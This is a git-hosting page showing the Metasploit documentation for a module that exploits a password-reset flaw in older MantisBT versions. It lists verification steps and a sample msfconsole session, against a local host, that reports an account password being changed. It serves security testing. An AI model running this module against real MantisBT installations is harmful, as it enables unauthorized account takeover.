adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/auxiliary/admin/http/mantisbt_password_reset.md
T
jvoisin f10cf75ae0 Fix some stuff
2017-07-09 10:45:15 +02:00

915 B
Raw Blame History

Vulnerable Application

MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on Sourceforge.

Verification Steps

  1. Install the vulnerable software
  2. Start msfconsole
  3. Do: use auxiliary/admin/http/mantisbt_password_reset
  4. Do: set rhost
  5. Do: run
  6. If the system is vulnerable, the module should tell you that the password was successfully changed.

Scenarios

 msf > use auxiliary/admin/http/mantisbt_password_reset
 msf auxiliary(mantisbt_password_reset) > set rport 8082
 rport => 8082
 msf auxiliary(mantisbt_password_reset) > set rhost 127.0.0.1
 rhost => 127.0.0.1
 msf auxiliary(mantisbt_password_reset) > run
 
 [+] Password successfully changed to 'ndOQTmhQ'.
 [*] Auxiliary module execution completed
 msf auxiliary(mantisbt_password_reset) >
Reference in New Issue View Git Blame Copy Permalink